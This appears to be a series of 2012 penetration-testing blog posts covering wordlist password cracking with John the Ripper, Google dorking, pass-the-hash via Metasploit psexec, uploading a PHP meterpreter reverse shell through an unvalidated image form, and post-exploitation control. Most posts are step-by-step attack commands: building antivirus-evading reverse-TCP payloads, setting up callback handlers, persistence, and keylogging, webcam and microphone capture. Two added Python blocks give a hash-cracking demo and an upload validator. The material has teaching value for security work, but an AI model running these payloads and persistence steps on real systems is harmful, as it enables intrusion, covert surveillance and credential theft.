<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQuJm0QCqK4wcb51OzdgHX8hMuImYRzW8xFifpwrExYHbDh6qAFHjJdWzXaq09Ssnawh64VLipprtilQBkwBZkQ2EwI1IyWwQZySyBl1hdXAWyiMeciYnThrKhta_ld56fRvtoIdVYIGI/s1600/john4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQuJm0QCqK4wcb51OzdgHX8hMuImYRzW8xFifpwrExYHbDh6qAFHjJdWzXaq09Ssnawh64VLipprtilQBkwBZkQ2EwI1IyWwQZySyBl1hdXAWyiMeciYnThrKhta_ld56fRvtoIdVYIGI/s640/john4.png" width="640" /></a></div>
And here come the passwords.....(scrolled off the screen)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Mf1no2wYqBTZYTCSYn3e4gu6QT9JGG4gX0JIUcQhbQwWJeD8OgGFDW90fJAyANFuXA8JvBMgEcICYzE571o3wwu0r5tG9FqmHnhyphenhyphenOtGLvaBW5tj4g5fq0_WEhcPwMVmAw4Oyy0RIOLg/s1600/john5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Mf1no2wYqBTZYTCSYn3e4gu6QT9JGG4gX0JIUcQhbQwWJeD8OgGFDW90fJAyANFuXA8JvBMgEcICYzE571o3wwu0r5tG9FqmHnhyphenhyphenOtGLvaBW5tj4g5fq0_WEhcPwMVmAw4Oyy0RIOLg/s640/john5.png" width="630" /></a></div>
So, from our word list of 4400 words, we yielded 1978 passwords. Let me say that again... <br />
FROM OUR WORD LIST OF 4400 WORDS, WE YIELDED 1978 PASSWORDS!<br />
<br />
And that's 1978 unique passwords. The number of accounts actually cracked with those 1978 passwords is even more than 4400, because many accounts share the same password, and with the mangling rules John tries ~300 mutations of each word in the list (semperfi gives us semperFi, semperfi1, semperfi123, etc.).<br />
<br />
This is a very small example of what can be done to generate more relevant password lists using twitter/websites/social media to supply you with the related words. Download john, hash your passwords, build a list of words relevant to your organization, and test the security of your passwords. Heck, we haven't even started talking about GPUs and oclhashcat, but we'll leave that for another time.<br />
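An offline stand-in for the procedure in this post (fetch tweets, extract the words, run them through John's mangling rules against the hashes), added here as an example and not the script from the screenshots: words_from_search() pulls candidate words out of search-API-style JSON, mangle() applies a handful of case and suffix rules in the spirit of --rules, and crack_md5() checks the results against plain MD5 hashes, the kind the dump in this post contains. The tweets and the "target" hashes are constructed so the block runs without Twitter, and the rule set is a deliberately tiny hypothetical subset of what John does. It is the same loop you would point at your own organization's hashes, as suggested above.<br />

```python
import hashlib
import json
import re

# Constructed stand-in for the JSON a tweet search returns; the post's script pulled
# 500 live tweets per search term. The text below is made up.
SAMPLE_SEARCH_JSON = json.dumps({"results": [
    {"text": "Semper Fi to all my brothers at Camp Lejeune! #USMC"},
    {"text": "Hooah! Fort Bragg weekend, oorah"},
    {"text": "SemperFi for life. Back from deployment, love my girl @jess"},
]})

# Constructed "target" hashes, computed from known strings so the demo checks itself.
SAMPLE_HASHES = [hashlib.md5(s.encode()).hexdigest()
                 for s in ("semperfi1", "Hooah123", "oorah", "correcthorsebattery")]

WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]{2,}")   # words of three or more characters


def words_from_search(raw_json):
    """Candidate words from tweet text: @handles and #tags dropped, lowercased,
    de-duplicated and sorted (the `sort | uniq` step in the post)."""
    data = json.loads(raw_json)
    words = set()
    for tweet in data.get("results", []):
        text = re.sub(r"[@#]\w+", " ", tweet.get("text", ""))
        words.update(w.lower() for w in WORD_RE.findall(text))
    return sorted(words)


def mangle(word):
    """Hypothetical miniature of John's --rules: three case variants times a few suffixes."""
    bases = {word, word.capitalize(), word.upper()}
    suffixes = ["", "1", "123", "2012", "!"]
    return sorted({b + s for b in bases for s in suffixes})


def crack_md5(hashes, words):
    """Return {hash: candidate} for every unsalted MD5 hash matched by a mangled word.
    Unsalted means one digest per candidate covers every account using that password."""
    wanted = {h.lower() for h in hashes}
    cracked = {}
    for w in words:
        for cand in mangle(w):
            h = hashlib.md5(cand.encode()).hexdigest()
            if h in wanted and h not in cracked:
                cracked[h] = cand
    return cracked


if __name__ == "__main__":
    words = words_from_search(SAMPLE_SEARCH_JSON)
    print(len(words), "candidate words")
    for h, cand in crack_md5(SAMPLE_HASHES, words).items():
        print(h, cand)
```

Three of the four constructed hashes fall to a wordlist of fewer than twenty words and five suffix rules; the fourth (a passphrase unrelated to the tweets) survives, which is the property a password policy should be aiming for.<br />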
<br />
Until next time, if you're going to hack, hack effectively.<br />
<br />
<br />
<br />
<span style="font-size: x-small;">And props to Kevin Young. Thanks for all the lengthy discussions about password security. I truly enjoy picking your brain.</span><br />
<br />
<b>Let Google Be Your Guide</b> (2012-04-05)<br />
Everyone knows that google is a great tool for finding information on the internet. What many don't realize is that google indexes many things that people didn't intend to make public, and makes them easily found with very little effort.<br />
There are many search "operators" that every hacker/security person should know about, such as:<br />
site:<br />
filetype:<br />
inurl:<br />
intitle:<br />
These operators can be used together as well as with normal search criteria.<br /><br />
One very simple search I performed yesterday led me to send this email today:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV6de-n5itfHn-pIExswomM1FpAKjEmI6lnDWVO1_ftKhUhqOrwyI9IBpBS0CBhypAfnHLHlwPESxJkzxlEk_NyAmOe8TDok_Nj9J2JXTkYvm07mJXe9l92dumQaREZsOLxDeyRWtbhOY/s1600/email.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 381px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV6de-n5itfHn-pIExswomM1FpAKjEmI6lnDWVO1_ftKhUhqOrwyI9IBpBS0CBhypAfnHLHlwPESxJkzxlEk_NyAmOe8TDok_Nj9J2JXTkYvm07mJXe9l92dumQaREZsOLxDeyRWtbhOY/s400/email.jpg" alt="" id="BLOGGER_PHOTO_ID_5727971328855057410" border="0" /></a><br />
In case you are wondering, I ended up having a nice phone conversation with the company's Director of IT, and after hyperventilating for a few moments, he assured me that all their resources would be focused on taking care of this issue immediately.<br /><br />
Now, at this point you may be asking yourself, "It can't really be THAT EASY to find sensitive data with google, can it?"<br />
Well, yes... yes it can.<br /><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhS1SEZUKR-A4BWCHRqkzQtie3itVuHfNKXl2mxD-qfh8iNpnefc2iCtbRk0R6t5DHl-jR1Wjca6CfoAE_HwFubiyMSORRX70iZ0aYqLiwiWv5Bb7SIYePkK2QOjoV5PBBhx-wgYLEb0s/s1600/ssn.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 175px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhS1SEZUKR-A4BWCHRqkzQtie3itVuHfNKXl2mxD-qfh8iNpnefc2iCtbRk0R6t5DHl-jR1Wjca6CfoAE_HwFubiyMSORRX70iZ0aYqLiwiWv5Bb7SIYePkK2QOjoV5PBBhx-wgYLEb0s/s400/ssn.jpg" alt="" id="BLOGGER_PHOTO_ID_5727971956165401970" border="0" /></a><br />
<br />
<b>Passing-The-Hash</b> (2012-04-04)<br />
To me there are few things as elegant as a nice pass-the-hash attack. This should drive home to each of us the risk associated with sharing passwords between systems, especially ones with different security requirements.<br />
With pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.<br /><br />
How it works:<br />
Once we gain root access to a system, one of the first things we do is grab password hashes (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.<br /><br />
One method for accomplishing this task is to use the Windows Credential Editor (wce). 
Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html<br />
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with the victim's username and hash. You can then interact with other systems using any built-in Windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.<br />
***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).<br />
<br />
Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, Metasploit has had a built-in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.<br />
<br />
We're going to use a hash we've gained from target1 (an old, vulnerable Windows server) to gain access to target2 (Windows XP SP3, fully patched).<br />
<br />
First, we dump target1's hashes using the hashdump command, and copy off the Administrator's hash.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptFldaeqz0xq1dDADN1clBD_erv18Eti1yvRTK1L7VsjXRhe1TlISR1rhv_6KpKFd504VgYKHLeRGaommgsZMKSHiaePTJ03d4A5KmNIyav-Cv8TRQAlrMuU0qMzBFnvE-i3auWOWw3w/s1600/pth1.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 167px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptFldaeqz0xq1dDADN1clBD_erv18Eti1yvRTK1L7VsjXRhe1TlISR1rhv_6KpKFd504VgYKHLeRGaommgsZMKSHiaePTJ03d4A5KmNIyav-Cv8TRQAlrMuU0qMzBFnvE-i3auWOWw3w/s400/pth1.jpg" alt="" id="BLOGGER_PHOTO_ID_5727596678909981906" border="0" /></a><br />
<br />
<br />
Now we start up msfconsole.<br />
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:<br />
<blockquote>use windows/smb/psexec<br />
set PAYLOAD windows/meterpreter/reverse_tcp</blockquote>
We then set the variables RHOST (target2's IP) and LHOST (our IP).<br />
<blockquote>set RHOST "target2 IP"<br />
set LHOST "Our IP"</blockquote><br />
Now comes the magic.
We set the user and password variables. Metasploit automatically recognizes when a hash is supplied for SMBPass and uses pass-the-hash rather than attempting a password logon.<br />
<blockquote>set SMBUser Administrator<br />
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...<br />
</blockquote>That's it, run "exploit".<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioNtywxzUu72tws9MfGS67v1cRjteUVdwguL0DGowR1QFI5Vf9LhcMSFXyuw6RuKQY6hsSgt-0k0QoFsVmW_lqX1sRvkcfdT2wBcQLNI24mHiESCUvhd38VeeBHh3_Y9dSXDtJy9KvgRk/s1600/pth2.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 325px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioNtywxzUu72tws9MfGS67v1cRjteUVdwguL0DGowR1QFI5Vf9LhcMSFXyuw6RuKQY6hsSgt-0k0QoFsVmW_lqX1sRvkcfdT2wBcQLNI24mHiESCUvhd38VeeBHh3_Y9dSXDtJy9KvgRk/s400/pth2.jpg" alt="" id="BLOGGER_PHOTO_ID_5727598792554066482" border="0" /></a><br />
<br />
As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.<br />
<br />
Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.<br />
<br />
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLP (http://www.blogger.com/profile/06716643637938670981)<br />
<br />
<br />
Deploying payload via PHP (published 2012-04-03)<br />
<br />
Another fun way to deploy our meterpreter payload is with PHP.<br />
<br />
Many web servers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the file type, this allows us to upload a PHP file containing our payload and then trick the server into executing it.
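The upload form in this post fails because it never verifies what was uploaded. As an added example that is not code from the original post (it assumes a Python upload handler, not the PHP site in the screenshots), here is the check the form should make: the weak, client-trusting check beside a hardened one that allow-lists extensions, verifies magic bytes, screens for script markers, and never reuses the client's filename.<br />

```python
import os
import secrets

# Allow-list: extension -> magic bytes the file must start with.
IMAGE_MAGIC = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# Markers an interpreter would act on: a cheap screen for image/script polyglots.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def weak_check(filename, content_type):
    """What the vulnerable form in the post effectively does: it trusts the
    client-supplied MIME type, so 'm.php' sent as image/jpeg sails through."""
    return content_type.startswith("image/")


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (accepted, reason, server_side_name).

    server_side_name is a fresh random name with the validated extension; the
    client's name is never reused, so 'shell.php.jpg' or '../x.php' never reach disk."""
    if len(data) > max_bytes:
        return False, "too large", None
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in IMAGE_MAGIC:
        return False, "extension not in allow-list: %r" % ext, None
    if not any(data.startswith(sig) for sig in IMAGE_MAGIC[ext]):
        return False, "content does not look like a %s" % ext, None
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside image data", None
    return True, "ok", secrets.token_hex(16) + "." + ext


def save_upload(data, server_side_name, upload_dir):
    """Write the accepted file with a non-executable mode. upload_dir is assumed
    to sit outside the document root, or in a directory with script execution off."""
    path = os.path.join(upload_dir, server_side_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


# Constructed sample uploads (not real files).
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
PHP_SHELL = b"<?php /* a payload like m.php would go here */ ?>"

if __name__ == "__main__":
    for name, ctype, body in [("m.php", "image/jpeg", PHP_SHELL),
                              ("m.jpg", "image/jpeg", PHP_SHELL),
                              ("photo.php.jpg", "image/jpeg", JPEG),
                              ("photo.jpg", "image/jpeg", JPEG + b"<?php ?>")]:
        print(name, "weak:", weak_check(name, ctype),
              "hardened:", validate_upload(name, body)[:2])
```

The magic-byte and marker checks only narrow what gets stored; the decisive control is that the stored file can never be executed by the web server.<br />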
Alternatively, this payload could be injected into a forum post or some such thing.<br />
<br />
The first thing we do is start up a meterpreter handler using the PHP payload, like this:<br />
<blockquote>/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J</blockquote>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPviRDEXEuyzIv2YPnbI9taKbvtf4RG-1384SxTxn0VIN0BKfrya013rPcfiXhJza3rP1XENsR6axCsWSILEwb5CLXK9-kbM6rNdj_HHfB3jf1-_CkBLZo-kjCajKtFoQuDsnyDnTbXA/s1600/php1.jpg"><img style="cursor: pointer; width: 467px; height: 293px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPviRDEXEuyzIv2YPnbI9taKbvtf4RG-1384SxTxn0VIN0BKfrya013rPcfiXhJza3rP1XENsR6axCsWSILEwb5CLXK9-kbM6rNdj_HHfB3jf1-_CkBLZo-kjCajKtFoQuDsnyDnTbXA/s400/php1.jpg" alt="" id="BLOGGER_PHOTO_ID_5727269948952294466" border="0" /></a><br />
<br />
Now we create our meterpreter PHP payload file. This command creates the PHP payload and saves it as m.php:<br />
<blockquote>/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php</blockquote>
<br />
Now we simply upload our PHP script as if it were an image file.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1phEj1v5o1wWWPOjqoCZyW9bCjhZM4jTqHUujH4Bvd6yr9t7N33u9qJ9BhxP8dMg6KV_2uzMe_UoFrx2qsMPeEtdxXQ2Td1ubPOvr5d06YXgn8HEyJuykCKGuzEOi1QyLbvz5a-dNXgw/s1600/php4.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 268px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1phEj1v5o1wWWPOjqoCZyW9bCjhZM4jTqHUujH4Bvd6yr9t7N33u9qJ9BhxP8dMg6KV_2uzMe_UoFrx2qsMPeEtdxXQ2Td1ubPOvr5d06YXgn8HEyJuykCKGuzEOi1QyLbvz5a-dNXgw/s400/php4.jpg" alt="" id="BLOGGER_PHOTO_ID_5727270329814254514" border="0" /></a><br />
<br />
<br />
Then we navigate a browser to the location where that server usually hosts images, and click on the file we just uploaded.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD4AN-APE_6MdAC3b_c0o1xOvgHhJdyDO0Vc52WGEvCKgNX9GyGPF3b7pChcRd7TE38dvFT194-m0fSCtIayCekNb44tbslRB5TPmfY4ss2XMXgp2XAM8SdKT6PXLhkwwa7pqVkiJVR54/s1600/php5.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD4AN-APE_6MdAC3b_c0o1xOvgHhJdyDO0Vc52WGEvCKgNX9GyGPF3b7pChcRd7TE38dvFT194-m0fSCtIayCekNb44tbslRB5TPmfY4ss2XMXgp2XAM8SdKT6PXLhkwwa7pqVkiJVR54/s400/php5.jpg" alt="" id="BLOGGER_PHOTO_ID_5727270487054538434" border="0" /></a><br />
<br />
The server runs our m.php, which connects back to our meterpreter handler on the specified port and gives us a shell on the target server. In this case, the process is running as the apache user.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv5Oa-lw4VhHTx-fHN8ZuDkfZC2v7W-ZSZHi_9BUCiHm608E9PRhZ4rUvUf7PBsponCjEZv7woMqq2VQ1mmD6SVxuyVkTl1knwo6_0kcJA6rfDFHe0m8u3qZ4OrUyZHVoMQj26wCbaej4/s1600/php3.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 229px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv5Oa-lw4VhHTx-fHN8ZuDkfZC2v7W-ZSZHi_9BUCiHm608E9PRhZ4rUvUf7PBsponCjEZv7woMqq2VQ1mmD6SVxuyVkTl1knwo6_0kcJA6rfDFHe0m8u3qZ4OrUyZHVoMQj26wCbaej4/s400/php3.jpg" alt="" id="BLOGGER_PHOTO_ID_5727638655275144450" border="0" /></a><br />
<br />
We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what all we've actually gained access to.
Chances are that there are database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly reachable from the outside world.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_cV6omkBUGmCqqI50APlqOOcigOa4AELL7BcOcuNWPTfOUutdcZ0Egj0Wqm-5liR0lQh8EjJL5haSo2vu7PMPsvuh0omp2KfNvpyqunILE5ek858MPXcF6Ph9BHDo8R8zym1ubO1tzY/s1600/php6.jpg"><img style="cursor: pointer; width: 512px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_cV6omkBUGmCqqI50APlqOOcigOa4AELL7BcOcuNWPTfOUutdcZ0Egj0Wqm-5liR0lQh8EjJL5haSo2vu7PMPsvuh0omp2KfNvpyqunILE5ek858MPXcF6Ph9BHDo8R8zym1ubO1tzY/s400/php6.jpg" alt="" id="BLOGGER_PHOTO_ID_5727303179393362242" border="0" /></a><br />
<br />
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLP (http://www.blogger.com/profile/06716643637938670981)<br />
<br />
<br />
Post Exploitation Control (published 2012-03-30)<br />
<br />
Once you've gained access to a box, there are many options for "post-exploitation" control.
Our main goals at that point in the game are:<br />
<ul>
<li>Continued control - you don't want to lose control after a reboot or whatnot.</li>
<li>Control flexibility - a control method that allows us to interact with the system however we want: shell, GUI, etc.</li>
<li>Facilitate privilege escalation - if we only have user-level access, we want a control method that facilitates efforts to gain SYSTEM/root.</li>
<li>Facilitate pivoting - an easy platform for attacking other systems through our compromised host.</li>
<li>Evading detection - we don't want logs/IDS/anti-virus to cause us any issues.</li>
</ul><br />
A good control method that meets these goals relatively well is to use meterpreter in a persistent fashion.<br />
<br />
The rest of the post will be a quick demo of:<br />
<ol>
<li>Creating a meterpreter payload exe</li>
<li>Setting up a command and control handler</li>
<li>Making the target systems persistent so the machine stays owned</li>
<li>A few useful meterpreter commands</li>
</ol><br />
<br />
1) Creating a meterpreter payload exe<br />
First we download Metasploit from <a href="http://www.metasploit.com/download/">http://www.metasploit.com/download/</a> and install it; I'll use version 4.2. You'll also need the ruby and ruby-gems packages installed.<br />
The first order of business is to create a stand-alone meterpreter exe that, when executed, connects back to a meterpreter listener, which we'll set up later. This is done with the msfpayload utility, and the output is then passed through msfencode to make it harder for IDS and anti-virus to detect. We are going to encode our payload into a known-good exe, so I download pslist.exe from Sysinternals to use for that. You can play around with other executables; your mileage may vary.<br />
This is the command I use to create my payload (replace the info in quotes). It's detected by about half of the AV vendors... still working on that.<br />
<blockquote>/opt/metasploit-4.2.0/app/msfpayload windows/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="LISTENER PORT" R | /opt/metasploit-4.2.0/app/msfencode -t exe ~/pslist.exe -o /root/payload.exe -e x86/shikata_ga_nai -c 10</blockquote><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0mWtdyb6FWpEER9lsYDGirVaDdaI5a34LCPsV8gN2lNmI29PtkZqvuMF8iyP3OO6bFl7uM__47CNyA47S4zyca05NqcltzfJrrwyWlyJ3jWZMVPsAUBDbE_24IeZeS1HIv1RuSZbQJA/s1600/makepayload.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 159px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0mWtdyb6FWpEER9lsYDGirVaDdaI5a34LCPsV8gN2lNmI29PtkZqvuMF8iyP3OO6bFl7uM__47CNyA47S4zyca05NqcltzfJrrwyWlyJ3jWZMVPsAUBDbE_24IeZeS1HIv1RuSZbQJA/s400/makepayload.jpg" alt="" id="BLOGGER_PHOTO_ID_5725807958064389442" border="0" /></a><br />
This creates our Metasploit payload and encodes it with the shikata_ga_nai encoder 10 times, outputting the final product to /root/payload.exe.<br />
The payload will connect to our handler (which we will set up in a second) and give us a meterpreter shell on the target.<br />
<br />
<br />
2) Setting up a command and control handler<br />
Now let's set up a persistent Metasploit handler on a machine out on the internet, so our pwned targets have a place to call home to.<br />
<br />
Note: If using a previous version of Metasploit, you can edit the msfcli script to add the -J (execute the selected module as a background job) functionality that we're going to use.
Instructions for adding that functionality can be found at:<br />
<a href="http://forum.intern0t.org/offensive-guides-information/3440-meterpreter-handler-persisent-connections.html">http://forum.intern0t.org/offensive-guides-information/3440-meterpreter-handler-persisent-connections.html</a><br />
<br />
To start up a listener we use the msfcli command like this:<br />
<blockquote>/opt/metasploit-4.2.0/app/msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost="LISTENER IP" lport="LISTENER PORT" ExitOnSession=false J</blockquote><br />
And we're ready to accept connections.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSVSPpRURBMln2PS-4gTwirqJdKkDTGRzIm0nXRqDKkyd-DehSpK9fbXpkhaaITWFN2mxEEOmOGyqn7s3VO2h-RDGBhxdBOhf-5_Oc9SJpcPD-KV190H7ggZuP9v8GKBzlFP-UDQM-Xk/s1600/starthandler3.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 346px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSVSPpRURBMln2PS-4gTwirqJdKkDTGRzIm0nXRqDKkyd-DehSpK9fbXpkhaaITWFN2mxEEOmOGyqn7s3VO2h-RDGBhxdBOhf-5_Oc9SJpcPD-KV190H7ggZuP9v8GKBzlFP-UDQM-Xk/s400/starthandler3.jpg" alt="" id="BLOGGER_PHOTO_ID_5725812633939020146" border="0" /></a><br />
<br />
When a target executes our payload, we'll see the handler take the connection and start a meterpreter session with it. You can see any established sessions with the command "sessions -l".
You can then interact with any session by running "sessions -i (sessionId)".<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBFFeqwo5T9RFm00tiE2YbKVY1qsfqtBOvyEYfBn_TyIC1PGEg3PJHM3PC0lztKQb0hof6UCigW4UTuZwle8sJSxvb1KcNVReWrfUrwzUvVh_3_v30Wz6mX9zEyunus5VWAaGakePv0bE/s1600/sessions.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 126px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBFFeqwo5T9RFm00tiE2YbKVY1qsfqtBOvyEYfBn_TyIC1PGEg3PJHM3PC0lztKQb0hof6UCigW4UTuZwle8sJSxvb1KcNVReWrfUrwzUvVh_3_v30Wz6mX9zEyunus5VWAaGakePv0bE/s400/sessions.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808278834436626" border="0" /></a><br />
<br />
<br />
3) Making the target systems persistent, so the machine stays owned<br />
Connect to a session with "sessions -i (sessionId)". Now you can make the system automatically reconnect every 5 seconds in the event you lose the connection to it, by issuing this command:<br />
<blockquote>run persistence -U -i 5 -p "LISTENER PORT" -r "LISTENER IP"</blockquote><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2T0752i_v1cu0dluGiLNBt1Azsa4w7NGJOlx8cU361rw2o5ew0pBSyndKkOw-1hnpyBTwv1QSVEqyc9CIIOHBC0nq1oBSM21G03d8kR_5340Q69FZAKufAAGYqxFTp8nTfRsS3x0DAR8/s1600/persistence.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 93px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2T0752i_v1cu0dluGiLNBt1Azsa4w7NGJOlx8cU361rw2o5ew0pBSyndKkOw-1hnpyBTwv1QSVEqyc9CIIOHBC0nq1oBSM21G03d8kR_5340Q69FZAKufAAGYqxFTp8nTfRsS3x0DAR8/s400/persistence.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808771881654402" border="0" /></a><br />
<br />
It converts the payload to a vbs file which it calls from the registry.
Now if your victim reboots or moves, or you restart your handler, they will just connect back in as soon as they can.<br />
<br />
<br />
4) A few useful meterpreter commands<br />
Now on to meterpreter commands. There is no way I could list all the uses of meterpreter, but here are some of the quick ones you'll want to know.<br />
<ul>
<li>getuid - shows the account you are executing under.</li>
<li>getsystem - uses a variety of methods to try to escalate privileges; if you're lucky it'll get you "NT AUTHORITY\SYSTEM".</li>
<li>hashdump - dumps the password hashes, as you'd expect.</li>
</ul>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLx_1clmWcjzglHazNn54QfYCxr1n9VkaSXjuhuX_l7JjqJW_FJ0cryQqxtLlqjstnZRAOEVqTipDMRDiNwcQt5IF7Ucxbj17BaDZZV4ZwZcNq-FYiSMD4e7hqqJuj6rfTeB-6ueHyqz8/s1600/meterpreter1.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 126px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLx_1clmWcjzglHazNn54QfYCxr1n9VkaSXjuhuX_l7JjqJW_FJ0cryQqxtLlqjstnZRAOEVqTipDMRDiNwcQt5IF7Ucxbj17BaDZZV4ZwZcNq-FYiSMD4e7hqqJuj6rfTeB-6ueHyqz8/s400/meterpreter1.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808172159864514" border="0" /></a><br />
These hashes can be cracked or used in a pass-the-hash attack, which we'll probably cover in a future post.<br />
<br />
<ul>
<li>getpid - gets your current process's pid.</li>
<li>migrate - moves the meterpreter service, injecting it into another process.</li>
</ul><br />
Here's an example of migrating over to the LSASS process:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtvHA7WkvIHgYyp8SDJ-BJCBxHUkRnMMSxPvjyM8tM4CJIiJ9lfiicHhjNI8uSvaUHuU3P84pgw8cwnUCOG72HrNn4ggNoUkTMa9IVZCBfNByeOPtdLC33rDFrFg4bJMVHEWZsh_JPJs/s1600/migrate.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtvHA7WkvIHgYyp8SDJ-BJCBxHUkRnMMSxPvjyM8tM4CJIiJ9lfiicHhjNI8uSvaUHuU3P84pgw8cwnUCOG72HrNn4ggNoUkTMa9IVZCBfNByeOPtdLC33rDFrFg4bJMVHEWZsh_JPJs/s400/migrate.jpg" alt="" id="BLOGGER_PHOTO_ID_5725819229767989826" border="0" /></a><br />
Sometimes you're unable to display hashes with hashdump because of process controls that only allow certain processes to access hashes. Simply migrating to another process such as LSASS can allow you to bypass that control.<br />
<br />
More commands:<br />
<ul>
<li>keyscan_start - start grabbing keystrokes</li>
<li>keyscan_dump - view keystrokes</li>
<li>record_mic - record audio from the default microphone</li>
<li>webcam_snap - take a snapshot from the specified webcam</li>
<li>screenshot - grab a screenshot of the user's desktop</li>
</ul><br />
<br />
There's much, much more you can do with meterpreter. There are built-in commands for network tunnels and for pivoting attacks onto additional systems through the currently owned target, but that probably deserves its own blog entry.<br />
<br />
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLP (http://www.blogger.com/profile/06716643637938670981)
